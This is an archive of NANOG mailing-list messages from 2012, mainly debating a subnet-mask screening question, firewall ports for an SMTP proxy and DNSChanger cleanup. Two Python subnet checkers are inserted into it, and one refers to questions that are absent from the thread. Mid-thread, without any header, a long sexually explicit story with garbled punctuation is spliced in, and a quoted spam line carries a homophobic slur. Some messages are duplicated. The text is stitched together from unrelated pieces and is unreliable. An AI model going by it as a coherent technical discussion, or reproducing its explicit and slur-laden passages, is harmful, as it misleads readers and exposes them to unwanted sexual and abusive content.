Subject: job screening question
In-Reply-To: Your message of "Sat, 07 Jul 2012 18:03:43 -0700."
<1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>
References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>
Message-ID: <102262.1341710188@turing-police.cc.vt.edu>

On Sat, 07 Jul 2012 18:03:43 -0700, Randy said:
> > "What's the problem with using 255.255.255.247 as a subnet mask if you
> > want to make a LAN subnet with 12 hosts?"
> > (5 word answer)

I'm not sure if that's a typo or excessive evil on the part of the questioner. ;)

> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era.

Yes, but even if it was *legal*, the "subnet doesn't contain 12 addresses" answer applies. ;)

From kmedcalf at dessus.com Sat Jul 7 20:26:28 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Sat, 07 Jul 2012 19:26:28 -0600
Subject: job screening question
In-Reply-To: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>
Message-ID:

> > "What's the problem with using 255.255.255.247 as a subnet
> > mask if you want to make a LAN subnet with 12 hosts?"
> > (5 word answer)

> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR
> era. If you so desire, give me about 2 hours since I do not have a scientific
> calculator handy; and I will get back to you with the complete-list.
> Definitely not 5 words as required from the HR stand point. So I get
> disqualified again!

Hehehe. Ok. So if this was 1986 then the answer would be:

No Hosts on the Network.

There is only 1 host bit, and both available addresses would be reserved for the directed-broadcast and subnet-broadcast address respectively, leaving no space for an actual host, let alone 12 of them.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org
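A small checker for the address and mask questions in Jimmy Hess's list and the 255.255.255.247 discussion above, added here as an illustration rather than code from the thread; it uses only Python's standard ipaddress module, and the function names are my own. It shows why 255.255.255.247 fails as a CIDR mask, why it leaves a single host bit and no usable hosts under the classic rule, which mask does hold 12 hosts, and how the 192.168.0.256 and 172.16.12.3 questions come out.

```python
"""Worked check of the subnet-mask screening questions discussed above.

Added example, not from the thread.  Function names are hypothetical.
Only the standard library is used.
"""
import ipaddress

ALL_ONES = 0xFFFFFFFF


def mask_to_int(mask: str) -> int:
    """Parse a dotted-quad mask such as '255.255.255.247' into a 32-bit int."""
    return int(ipaddress.IPv4Address(mask))


def is_contiguous_mask(mask: str) -> bool:
    """True if the mask is a run of 1-bits followed only by 0-bits (CIDR-valid).

    For such a mask the bitwise complement is 2**k - 1, i.e. all of its set
    bits are the low bits, so inv & (inv + 1) == 0.  255.255.255.247 has a
    zero in bit 3 with ones on both sides of it, so the test fails for it.
    """
    inv = (~mask_to_int(mask)) & ALL_ONES
    return inv & (inv + 1) == 0


def host_bits(mask: str) -> int:
    """Number of zero bits in the mask, contiguous or not (the pre-CIDR view)."""
    return 32 - bin(mask_to_int(mask)).count("1")


def usable_hosts(mask: str) -> int:
    """Host addresses left after reserving the all-zeros and all-ones patterns.

    This is the classic rule applied in the thread: with one host bit both
    patterns are reserved and nothing remains for a real host.
    """
    return max(2 ** host_bits(mask) - 2, 0)


def prefix_length(mask: str) -> int:
    """CIDR prefix length; refuses a non-contiguous mask."""
    if not is_contiguous_mask(mask):
        raise ValueError(f"{mask} is not a valid CIDR netmask")
    return 32 - host_bits(mask)


def smallest_mask_for_hosts(wanted: int) -> str:
    """Longest-prefix contiguous mask that still leaves room for `wanted` hosts."""
    for bits in range(1, 33):
        if 2 ** bits - 2 >= wanted:
            return str(ipaddress.IPv4Network(f"0.0.0.0/{32 - bits}").netmask)
    raise ValueError("no IPv4 subnet can hold that many hosts")


def is_valid_ipv4(text: str) -> bool:
    """Syntactic check; '192.168.0.256' fails because an octet exceeds 255."""
    try:
        ipaddress.IPv4Address(text)
    except ValueError:  # AddressValueError is a ValueError subclass
        return False
    return True


def is_private_ipv4(text: str) -> bool:
    """True for RFC 1918 space such as 172.16.12.3 (inside 172.16.0.0/12)."""
    return is_valid_ipv4(text) and ipaddress.IPv4Address(text).is_private


def check_mask_for_lan(mask: str, wanted: int) -> str:
    """One-line verdict in the spirit of the short answer the thread asks for."""
    if not is_contiguous_mask(mask):
        return (f"invalid netmask: {mask} is non-contiguous, leaves "
                f"{host_bits(mask)} host bit(s) and {usable_hosts(mask)} usable hosts")
    have = usable_hosts(mask)
    if have < wanted:
        return f"/{prefix_length(mask)} gives {have} usable hosts, need {wanted}"
    return f"/{prefix_length(mask)} ok: {have} usable hosts for {wanted}"


if __name__ == "__main__":
    print(check_mask_for_lan("255.255.255.247", 12))
    print("smallest mask for 12 hosts:", smallest_mask_for_hosts(12))
    print("192.168.0.256 valid?", is_valid_ipv4("192.168.0.256"))
    print("172.16.12.3 private?", is_private_ipv4("172.16.12.3"))
```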
I?d just get in the back seat and let it ride up here with you,? he replied, laughing. This time, Jen drove back to her apartment at a more sensible speed. They pulled in to a parking spot, and Jen helped Chris get his stuff out of the back seat, along with her own messenger bag. She looked at the laundry bag and gave Chris a questioning glance. ?To avoid soaking your sheets like last night,? he explained. ?Oh, good. I was thinking that you were sorely mistaken if you were hoping to get me to do your laundry. You didn?t bring it; and it?s not happening anyway.? ?No, nothing like that. I?m thinking that I probably need to help youwith laundry tonight, considering what happened last night. Now, how am I going to get up to the room?? Chris pointed at his erection, which, although nowhere near its full size, was pressing visibly against the baggy black pants, creating a large tent in the fabric. ?Easy-peasey, sweetie pie. We just cuddle on the way up.? Jen fitted action to words, and pressed her pert butt against his shaft, wrapping his arms around her. Chris could feel his monster stirring again, growing and straining against the spandex confinement. ?Uh, Jen? I don?t know how long that?s gonna work. You feel a little too good for me to stay calm.? Plus, if this spandex gets much tighter, my eyes are going to start bugging out. ?Well, then, we?d better just hurry.? Jen?s curvy ass bounced against his rod all the way into the elevator. Chris groaned in discomfort once they were there, leaning back against the wall and trying to adjust his pants to give him just a little more room. His fat python was at least twenty four inches long now and had grown well past his right knee. The thick shaft was clearly outlined, even in the previously baggy pants. ?What are we going to do about Tasha and Kimber? I don?t want to have dinner with them at full mast.? ?Aw, I was hoping to use it as a sideboard for the buffet.? She patted his penis fondly. 
?You hustle into my room as soon as we get in. I?ll run interference. I?ll have to start dinner; it?s my night to cook. While I?m doing that, you can let off some pressure in the bedroom, okay? When you get yourself back down to a size appropriate for polite company, put on your sweats and come out. I?ll tell Tasha and Kimber you had some homework you had to knock out first.? ?Uh, Jen, if I jerk off more, I?m gonna be even hungrier. I don?t know if you really realize how much I need to eat to keep myself stoked. It?s not normal.? Chris?s stomach rumbled, reminding him. The elevator doors opened and Jen jumped in front of him again, mashing her butt into his groin. He sighed with pleasure and wrapped his arms around her waist. ?Sweetie, I?ve delivered pizza for you before. I?ve got gobs of pasta and bread, plus plenty of side dishes, and desert. There?s a load of snacks in the cupboard, plus we just bought ice cream last night. If all fails, I can always order more pizza. Trust me, those big balls of yours are gonna be as full as I can possibly get them.? She opened her door and pushed Chris towards her bedroom as she hopped into the living room in front of Tasha and Kimber, dropping her messenger bag and Chris?s bundle. ?We?re here! Lemme get dinner started. I hope you guys like baked spaghetti!? Chris waddled down the hall, his growing rod preventing him from bending his right leg. He heard the girls behind him as he stepped into Jen?s room. ?Where?s Chris going?? asked Tasha. ?Yeah, what?s his rush? He didn?t even say ?Hi?,? Kimber complained. ?He has some homework he has to jump right on,? Jen explained. ?It has to be submitted tonight, so he needed to get it taken care of immediately. He?s gonna tackle it with both hands, and then he will be able to relax and have dinner with us.? Chris shut the door behind him, cutting off their voices. He kicked off his shoes and nearly tore off his pants, desperate to get the too-snug spandex off his protesting prick. 
He finally was able to shuck off the spandex and his dick sprung up enthusiastically, rapidly ballooning to its full colossal size now that it was free of the fabric prison. Chris walked across the room to Jen?s closet, his monstrous pole bobbing with each step, and grabbed first one, then a couple, of her towels. Ah, I?m doing laundry anyway.He seated himself comfortably on her bed and, wrapping the towel over his cock head, began to stroke himself eagerly. Wait a minute. I?m forgetting something. Chris laid back and reached into Jen?s bedside table, grabbing a bottle of Astroglide. He opened it and began squirting it liberally all over his tremendous shaft. Only the best for the biggest.Once his entire girth was coated with the lube, Chris clasped his cock with both hands and began stroking himself even more enthusiastically. Man! I?m so horny! It?s been?less than half an hour, actually. I guess I just need it more now. Feels soooo good.He abandoned himself to the pleaure, immersing himself in his task. He didn?t hear the girls talking in the other room. ? ? ? Part 65. Jen was working on her baked spaghetti as she lectured her roommates. ?Look, this is really important. Chris is self-conscious about his appearance. He?s at a new school in a new city, and he doesn?t want to stand out. I don?t want you guys making a big deal about it, OK?? ?Wait? He doesn?t want to stand out, but he dresses like a Goth with those huge baggy pants??, objected Kimber. I thought that was the point of Goth wear, to stand out as a Goth. I mean, it?s pretty obvious, especially ?cause he?s Asian. I?ve never seen a Goth Asian guy before.? ?Yeah. I never though I would see you dating a Goth. I though you said they reminded you of Eddie Munster.? Tasha chimed in, helpfully. ?He?s nota Goth! He wears those big baggy pants to hide the fact that he?s?He?s?He is?? Jen was at a loss as to how to explain this delicately. ?He?s what??, asked Tasha. ?Arrrgh! He has a really big penis, okay?? 
Jen just blurted it out. Both Kimber and Tasha perked up immediately. ?His whole package is gigantic, all right? It?s like freakishly, unbelievably massive. He wears the baggy pants to hide the fact that he?s huge.? She focused on preparing the food and tried to avoid their gaze, blushing furiously. ?I knew it!? Tasha jumped around the kitchen. ?I knew you liked guys that were totally hung! Whenever we were watching porn, you always acted like you weren?t staring when the really big studs were on screen, but I knewyou were staring at them. So, Chris is hung like those guys? Wow! Do you think he would let us see it?? Kimber grabbed a kitchen towel and snapped it at Tasha?s butt. ?Would you shut up? Just because you are fixated on pics and videos doesn?t mean that everyone is. Anyway, you would know that Jen had a thing for well-endowed guys if you ever listened to her talk about Todd.? ?Who??, asked Tasha, rubbing her butt. ?Todd, the guy she dated when she was a senior in high school. Jen complains about what a spineless creep he was, but she dated him all year. She said he was ?pretty big? more than once, so she must have been willing to put up with him for that. Is Chris as big as Todd was, Jen?? Jen snorted out loud. ?Ha! As if! Chris is over twice as big soft as Todd ever was, hard!? Am I really that transparent about my size fetish? I thought I hid it pretty well. ?Hang on, that doesn?t make sense.? Tasha scrunched up her face, remembering. ?When we were partying Friday before last, you said that your ex was almost nine inches. If Chris is twice as big soft, he would be eighteen inches long before he had a hard on. Did you mean that Chris is twice as big hardas Todd was soft? No, that doesn?t sound very impressive. I?m confused.? There was no way around it. Jen bit the bullet. ?I meant what I said. Chris is over twice as big softas Todd was hard. He?s nineteen inches.? Both Tasha and Kimber erupted in unison. ?No freaking way!? ?You have to be kidding. 
________________________________
From: Keith Medcalf
To: "nanog at nanog.org"
Sent: Saturday, July 7, 2012 6:26 PM
Subject: RE: job screening question

> > "What's the problem with using 255.255.255.247 as a subnet
> > mask if you want to make a LAN subnet with 12 hosts?"
> > (5 word answer)

> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR
> era. If you so desire, give me about 2 hours since I do not have a scientific
> calculator handy; and I will get back to you with the complete-list.
> Definitely not 5 words as required from the HR stand point. So I get
> disqualified again! Hehehe.

Ok. So if this was 1986 then the answer would be: No Hosts on the Network.
There is only 1 host bit, and both available addresses would be reserved for the directed-broadcast and subnet-broadcast address respectively, leaving no space for an actual host, let alone 12 of them.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From jlewis at lewis.org Sat Jul 7 20:34:59 2012
From: jlewis at lewis.org (Jon Lewis)
Date: Sat, 7 Jul 2012 21:34:59 -0400 (EDT)
Subject: job screening question
In-Reply-To: <102262.1341710188@turing-police.cc.vt.edu>
References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <102262.1341710188@turing-police.cc.vt.edu>
Message-ID:

On Sat, 7 Jul 2012 valdis.kletnieks at vt.edu wrote:

> On Sat, 07 Jul 2012 18:03:43 -0700, Randy said:
>>> "What's the problem with using 255.255.255.247 as a subnet mask if you
>>> want to make a LAN subnet with 12 hosts?"
>>> (5 word answer)
>
> I'm not sure if that's a typo or excessive evil on the part of the questioner. ;)
>
>> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era.
>
> Yes, but even if it was *legal*, the "subnet doesn't contain 12 addresses" answer applies. ;)

It's just a mask...you can do all sorts of crazy things with netmasks. The results of using "unusual" ones are not typically predictable or desirable to those who might accidentally use them.
----------------------------------------------------------------------
 Jon Lewis, MCP :)           |  I route
 Senior Network Engineer     |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From nanog195 at yahoo.com Sat Jul 7 20:36:41 2012
From: nanog195 at yahoo.com (NIG NOG)
Date: Sat, 7 Jul 2012 18:36:41 -0700 (PDT)
Subject: job screening question
In-Reply-To:
References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <102262.1341710188@turing-police.cc.vt.edu>
Message-ID: <1341711401.28188.YahooMailNeo@web142502.mail.bf1.yahoo.com>
From ops.lists at gmail.com Sat Jul 7 21:07:29 2012
From: ops.lists at gmail.com (Suresh Ramasubramanian)
Date: Sun, 8 Jul 2012 07:37:29 +0530
Subject: July DNS
In-Reply-To: <1341710615.61091.YahooMailNeo@web142503.mail.bf1.yahoo.com>
References: <1341710615.61091.YahooMailNeo@web142503.mail.bf1.yahoo.com>
Message-ID:

Did hipcrime turn his talents to nanog?

On Sun, Jul 8, 2012 at 6:53 AM, NIG NOG wrote:
> The guard's face reddened again, and the veins in his thick neck stood out. "I said take off your pants, faggot! You can't hide your tiny little cock any more!

--
Suresh Ramasubramanian (ops.lists at gmail.com)

From owen at delong.com Sat Jul 7 21:32:25 2012
From: owen at delong.com (Owen DeLong)
Date: Sat, 7 Jul 2012 19:32:25 -0700
Subject: job screening question
In-Reply-To: <6287cebd84702948aa393809d67e39e0@mail.dessus.com>
References: <6287cebd84702948aa393809d67e39e0@mail.dessus.com>
Message-ID: <9BE5895A-B8CE-4EDD-AF20-AC3FA1BCA623@delong.com>

On Jul 7, 2012, at 5:44 PM, Keith Medcalf wrote:

>> "What's the problem with using 255.255.255.247 as a subnet mask if you
>> want to make a LAN subnet with 12 hosts?"
>> (5 word answer)
>
> Unemployment Office Is That Way ->
>
> Is the only 5 word answer I could come up with. The correct answer "invalid netmask", is only two words.
>

LoL... Even if you allowed for discontiguous subnet masks, you'd need to use 255.255.255.243 and not 255.255.255.247 to achieve 12 hosts. Not sure what 5 word answer you're looking for, but Keith's answer and mine are the two most obvious issues I can think of.

>
>> "What TCP destination port numbers should be allowed through the
>> perimeter stateful firewall device to and from a mail server whose
>> only purpose is to proxy SMTP mail from internal sources?"
>> (one number answer)
>
> Short Answer: There is no answer to the question that can be expressed in one number.
Sure there is, if you count "none" as a number.

> Outbound connections to TCP destination port 25 only. Returning traffic (including associated ICMP) should be automatically handled by your stateful inspection firewall. If not, you need to buy a better firewall.

I'd allow 25 and 465 outbound, myself. No reason to block SSL if the remote side offers the capability.

ICMP wouldn't be a TCP destination port number anyway.

> Any applicant who provides any answer should be rejected out of hand as (a) being unable to read (b) being a threat to security.

LoL... Some truth to that.

Owen

From kmedcalf at dessus.com Sat Jul 7 22:31:32 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Sat, 07 Jul 2012 21:31:32 -0600
Subject: FW: job screening question
In-Reply-To: <2f05fd19e52aa34682f92ba133eb60ef@mail.dessus.com>
Message-ID: <11b81849e3bdac41b79ab4ded81e5844@mail.dessus.com>

(now copied to list as well)

On Sat 07 July, 2012 at 20:32, Owen DeLong wrote:

>>> "What TCP destination port numbers should be allowed through the
>>> perimeter stateful firewall device to and from a mail server whose
>>> only purpose is to proxy SMTP mail from internal sources?"
>>> (one number answer)

>> Short Answer: There is no answer to the question that can be expressed in
>> one number.

> Sure there is, if you count "none" as a number.

None, NIL, NUL, NULL would be valid I suppose if nulls were permitted. 0 however is not correct.

>> Outbound connections to TCP destination port 25 only. Returning traffic
>> (including associated ICMP) should be automatically handled by your stateful
>> inspection firewall. If not, you need to buy a better firewall.

> I'd allow 25 and 465 outbound, myself. No reason to block SSL if the remote
> side offers the capability.
http://www.imc.org/ietf-apps-tls/mail-archive/msg00204.html

SMTPS is deprecated and port 465 is no longer registered for SMTPS (SMTP over SSL), it is now for

urd    tcp    URL Rendesvous Directory for SSM    465

So even though many folks may still run SMTPS on port 465, you SHOULD be using STARTTLS on port 25.

> ICMP wouldn't be a TCP destination port number anyway.

Very true. Then again, there is a significant proportion of the same experts who think DNS only runs over UDP ...

> > Any applicant who provides any answer should be rejected out of hand as
> > (a) being unable to read (b) being a threat to security.

> LoL... Some truth to that.

You would be surprised how many people think that if you permit tcp host x.x.x.x any eq 25 to let traffic out, then you need permit tcp any eq 25 host x.x.x.x as the inverse to permit returning traffic. This is more of a problem when using packet filtering than it is when configuring stateful inspection firewalls. Nonetheless, the question does ask what should be opened "to and from" in order to "proxy SMTP mail from internal sources". It could of course just be a brilliant question designed to detect such problems ...

> Owen

Keith

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From mysidia at gmail.com Sat Jul 7 23:09:54 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sat, 7 Jul 2012 23:09:54 -0500
Subject: job screening question
In-Reply-To: <6287cebd84702948aa393809d67e39e0@mail.dessus.com>
References: <6287cebd84702948aa393809d67e39e0@mail.dessus.com>
Message-ID:

On 7/7/12, Keith Medcalf wrote:
>>"What's the problem with using 255.255.255.247 as a subnet mask if you
>>want to make a LAN subnet with 12 hosts?"
>> (5 word answer)

> Unemployment Office Is That Way ->
> Is the only 5 word answer I could come up with. The correct answer "invalid
> netmask", is only two words.

5 words = "The netmask is not valid."
Also acceptable response; "A netmask must be contiguous."
> Short Answer: There is no answer to the question that can be expressed in
> one number.

Acceptable answers: "None", or "25"
Unacceptable answers: any number other than 25, or anything other than a one-word answer. (After your rep has told them that you expect a one-word answer, of course.)

--
-JH

From bonomi at mail.r-bonomi.com Sun Jul 8 02:12:10 2012
From: bonomi at mail.r-bonomi.com (Robert Bonomi)
Date: Sun, 8 Jul 2012 02:12:10 -0500 (CDT)
Subject: job screening question
In-Reply-To:
Message-ID: <201207080712.q687CA7m072035@mail.r-bonomi.com>

> From nanog-bounces+bonomi=mail.r-bonomi.com at nanog.org Sat Jul 7 23:11:09 2012
> Date: Sat, 7 Jul 2012 23:09:54 -0500
> Subject: Re: job screening question
> From: Jimmy Hess
> To: Keith Medcalf
> Cc: "nanog at nanog.org"
>
> On 7/7/12, Keith Medcalf wrote:
> >>"What's the problem with using 255.255.255.247 as a subnet mask if you
> >>want to make a LAN subnet with 12 hosts?"
> >> (5 word answer)
> > Unemployment Office Is That Way -> Is the only 5 word answer I could
> > come up with. The correct answer "invalid netmask", is only two words.
>
> 5 words = "The netmask is not valid."
> Also acceptable response; "A netmask must be contiguous."

"Subnet/Netmask is '/31'-equivalent, unusable."
"Subnet too small/tiny/minuscule/{other synonyms} to use."
"Invalid netmask under CIDR rules" (also transpose first two words)
"Invalid netmask according to RFC[mumble]" (also transpose first two words)
"Too many hosts for subnet."
"Twelve hosts will not fit."
"You've _got_ to be kidding!"
"Apparent bit-rot in questions database"

If _written_, I'd be tempted to respond:

A) Netmask is '/31'-equivalent, unusable
B) Invalid netmask under CIDR rules
C) Apparent bit-rot in questions database
D) Question probably intended LSB 248.
E) Not enough bits in subnet
F) too many hosts for subnet
G) all of the above responses

and then circle G.
<*EVIL* grin>

From ispbuilder at gmail.com Sun Jul 8 05:49:00 2012
From: ispbuilder at gmail.com (Mike)
Date: Sun, 08 Jul 2012 07:49:00 -0300
Subject: Running your own DNSchanger proxies
In-Reply-To:
References:
Message-ID: <4FF9659C.5090601@gmail.com>

On 12-07-07 10:13 PM, Jason Duerstock wrote:
> As an intellectual exercise, I think this is interesting and worth the
> effort. As an actual implementation, I think it's more effective to block
> DNS traffic to the affected subnets. Let the breakage occur, and then let
> the end users get their broken machines fixed rather than let them continue
> hobbling along with this hack in place.
>
> Jason

Agreed, fixing the problem > patching the problem.

Some other ideas -

* Assuming you're running the nameserver under Linux, an iptables rule would remove the need to have all the ip addresses added (iptables -I PREROUTING -t nat -d $badblock/24 -s 0.0.0.0/0 -j DNAT --to your.local.ip.address)
* bind should by default accept connections on all interfaces if you don't tell it to bind to anything, unless behaviour has changed in versions more recent than my last bind experience
* Having whatever nameserver you use return a single IP address for everything you request, which points you to a single web page that explains how to fix the problem can be good
* that single IP address can also run a pop3/imap server that accepts any username/password and dumps the user into a read-only mailbox with a single message saying "fix your infected PC"

From mattias at ahnberg.pp.se Sun Jul 8 09:46:03 2012
From: mattias at ahnberg.pp.se (Mattias Ahnberg)
Date: Sun, 08 Jul 2012 16:46:03 +0200
Subject: job screening question
In-Reply-To:
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org>
Message-ID: <4FF99D2B.1030406@ahnberg.pp.se>

On 2012-07-08 00:58, Jimmy Hess wrote:
> "What's the problem with using 255.255.255.247 as a subnet mask if you
> want to make a LAN subnet with 12 hosts?"
> (5 word answer)

I don't much appreciate these types of questions where you expect an exact answer based on your own phrasing/ideas. If running through a form with questions like this, leave space for open-ended answers to give the person a chance to phrase and explain in his own ways. Don't let the final "pass" or "no pass" fall to an HR person who can't fully appreciate or know the details and see the actual clue in an unexpected answer. You might lose a lot of really good candidates by being too harsh on that.

It's beneficial to build a team of clued people with the right personality, interest and mentality to what they do rather than seek people who have taught themselves how to answer certification tests in a way they know the creator of the test expects them. :)

Hire for attitude, train for skill!

--
/ahnberg.

From matthew at matthew.at Sun Jul 8 12:58:34 2012
From: matthew at matthew.at (Matthew Kaufman)
Date: Sun, 8 Jul 2012 10:58:34 -0700
Subject: job screening question
In-Reply-To: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>
References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>
Message-ID: <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at>

On Jul 7, 2012, at 6:03 PM, Randy wrote:

>
> ....
>> "When a number received in an IP packet is presented in network byte
>> order, and the host architecture is big endian, what must be done to
>> convert the number into host byte order?"
>> (one word answer)
>
> My response would be to have a field-day with HR talking about MSB and LSB.
> Certainly wouldn't be a one-word answer. So HR disqualifies me?
>>
>> "What's the problem with using 255.255.255.247 as a subnet
>> mask if you want to make a LAN subnet with 12 hosts?"
>> (5 word answer)
>
> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era.
> If you so desire, give me about 2 hours since I do not have a scientific
> calculator handy; and I will get back to you with the complete-list.
>
> Definitely not 5 words as required from the HR stand point. So I get disqualified again!
>
> ./Randy
>

Oh, come on, 247 decimal is 0xf7... A single zero bit in the mask isn't enough for 12 hosts no matter where it is. If you need a scientific calculator and 2 hours for that, HR is right.

Matthew Kaufman

Sent from my iPad

From mysidia at gmail.com Sun Jul 8 14:23:31 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sun, 8 Jul 2012 14:23:31 -0500
Subject: job screening question
In-Reply-To: <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at>
References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at>
Message-ID:

On 7/8/12, Matthew Kaufman wrote:
> On Jul 7, 2012, at 6:03 PM, Randy wrote:
>> My response would be: Discontiguous subnet masks were allowed in the
>> pre-CIDR era. If you so desire, give me about 2 hours since I do not have

See, I would advocate using the filter questions for sorting the apps, and tell the applicants "We're expecting a 5 words or less answer, not a history lesson or technical explanation."; if more than 25% of applicants out of say 1000 get it correct, then the filter is considered valid, and the ones that pass the most filter questions are the least likely to not be a waste of time.

I'm not sure which era exactly in which you consider it legal and kosher to assign to a network, but even if you relax all the rules that require contiguity, it is still an illegal network mask for end hosts, just like 255.255.255.254 is; if an applicant doesn't flag it out as bad/invalid subnet mask in this era, then they might fail the filter, even if they correctly observe that you can't fit that many hosts in.

>> a scientific calculator handy; and I will get back to you with the
>> complete-list.

A what?
>> Definitely not 5 words as required from the HR stand point. So I get >> disqualified again! >> ./Randy > Oh, come on, 247 decimal is 0xf7... A single zero bit in the mask isn't > enough for 12 hosts no matter where it is. Correct... it's not even enough bits for 1 end host; it's enough bits for 1 broadcast address. > If you need a scientific calculator and 2 hours for that, HR is right. > Matthew Kaufman > Sent from my iPad -- -JH From william.mccall at gmail.com Sun Jul 8 14:57:34 2012 From: william.mccall at gmail.com (William McCall) Date: Sun, 8 Jul 2012 14:57:34 -0500 Subject: job screening question In-Reply-To: References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at> Message-ID: On Sun, Jul 8, 2012 at 2:23 PM, Jimmy Hess wrote: > I'm not sure which era exactly in which you consider it legal and > kosher to assign to a network, but even if you relax all the rules > that require contiguity, it is still an illegal network mask for end > hosts, just like 255.255.255.254 is; if an applicant doesn't flag it > out as bad/invalid subnet mask in this era, then they might fail the > filter, > Well, the correct answer is that it IS invalid (because the real world routers tell us so) and this should be the only acceptable answer, but, just to be sure, /31s are valid, can be used, and are used. 
-- William McCall From tvhawaii at shaka.com Sun Jul 8 15:18:59 2012 From: tvhawaii at shaka.com (Michael Painter) Date: Sun, 8 Jul 2012 10:18:59 -1000 Subject: job screening question References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> <4FF99D2B.1030406@ahnberg.pp.se> Message-ID: <073348E566D64983816610E1804660AE@owner59e1f1502> Mattias Ahnberg wrote: > It's beneficial to build a team of clued people with the right personality, > interest and mentality to what they do rather than seek people who have > taught themselves how to answer certification tests in a way they know > the creator of the test expects them. :) Just came across this tidbit: Technical Terms of Computer Science #515: "Certification: A business model that compresses hot air to paper, then trades it for currency." From tyler.haske at gmail.com Sun Jul 8 15:31:35 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Sun, 8 Jul 2012 16:31:35 -0400 Subject: job screening question In-Reply-To: <073348E566D64983816610E1804660AE@owner59e1f1502> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> <4FF99D2B.1030406@ahnberg.pp.se> <073348E566D64983816610E1804660AE@owner59e1f1502> Message-ID: Cheaper than a college degree and doesn't require you to 'know the right person.' > Technical Terms of Computer Science #515: > > "Certification: A business model that compresses hot air to paper, > then trades it for currency." 
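Returning to the 255.255.255.247 screening question earlier in this thread: as an added example (not code from any poster), a small Python check that classifies a dotted-quad mask as contiguous or not, counts its host bits, and says whether it can hold a given number of hosts. It treats a /31 as good for two hosts per RFC 3021 (the point William McCall raises), rejects a discontiguous mask outright, and the helper names are my own.

```python
"""Added example (not any poster's code): sanity-check an IPv4 subnet mask
against a required host count, the way the screening question asks.

Assumptions: masks are dotted-quad strings; a /31 counts as usable for two
hosts (RFC 3021 point-to-point); a discontiguous mask is rejected outright,
as current routers do.
"""
import ipaddress


def mask_to_int(mask: str) -> int:
    """Parse a dotted-quad mask into a 32-bit integer (ValueError on junk)."""
    return int(ipaddress.IPv4Address(mask))


def is_contiguous(mask_int: int) -> bool:
    """True when the mask is a run of ones followed only by zeros."""
    host_part = (~mask_int) & 0xFFFFFFFF
    # Low-order ones with nothing set above them is one less than a power of two.
    return host_part & (host_part + 1) == 0


def host_bits(mask_int: int) -> int:
    """Number of zero bits in the mask, contiguous or not."""
    return 32 - bin(mask_int).count("1")


def usable_hosts(prefix_len: int) -> int:
    """End hosts a contiguous prefix of this length can address."""
    h = 32 - prefix_len
    if h == 0:
        return 0          # /32: a host route, no subnet at all
    if h == 1:
        return 2          # /31: point-to-point link (RFC 3021)
    return 2 ** h - 2     # subtract the network and broadcast addresses


def smallest_prefix_for(hosts: int) -> int:
    """Longest prefix length whose usable host count still covers `hosts`."""
    for plen in range(32, -1, -1):
        if usable_hosts(plen) >= hosts:
            return plen
    raise ValueError("no IPv4 prefix holds that many hosts")


def evaluate_mask(mask: str, wanted_hosts: int) -> dict:
    """Classify `mask` for a LAN that must hold `wanted_hosts` end hosts."""
    m = mask_to_int(mask)
    h = host_bits(m)
    result = {"mask": mask, "hex": f"0x{m:08x}", "host_bits": h,
              "contiguous": is_contiguous(m), "fits": False}
    if not result["contiguous"]:
        # 255.255.255.247 lands here: 0xfffffff7 has a lone zero at bit 3.
        result["prefix_len"] = None
        result["usable_hosts"] = 0
        result["reason"] = (f"discontiguous mask {result['hex']}: not a valid "
                            f"subnet mask, and only {h} host bit(s) anyway")
        return result
    plen = 32 - h
    usable = usable_hosts(plen)
    result["prefix_len"] = plen
    result["usable_hosts"] = usable
    if usable >= wanted_hosts:
        result["fits"] = True
        result["reason"] = f"/{plen} fits {wanted_hosts} hosts ({usable} usable)"
    else:
        result["reason"] = (f"/{plen} has {usable} usable host(s), "
                            f"fewer than {wanted_hosts}")
    return result


def suggest_mask(hosts: int) -> str:
    """Dotted-quad mask of the smallest subnet that holds `hosts` end hosts."""
    plen = smallest_prefix_for(hosts)
    return str(ipaddress.IPv4Network(f"0.0.0.0/{plen}").netmask)


if __name__ == "__main__":
    for candidate in ("255.255.255.247", "255.255.255.254", "255.255.255.240"):
        print(candidate, "->", evaluate_mask(candidate, 12)["reason"])
    print("smallest mask for 12 hosts:", suggest_mask(12))
```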
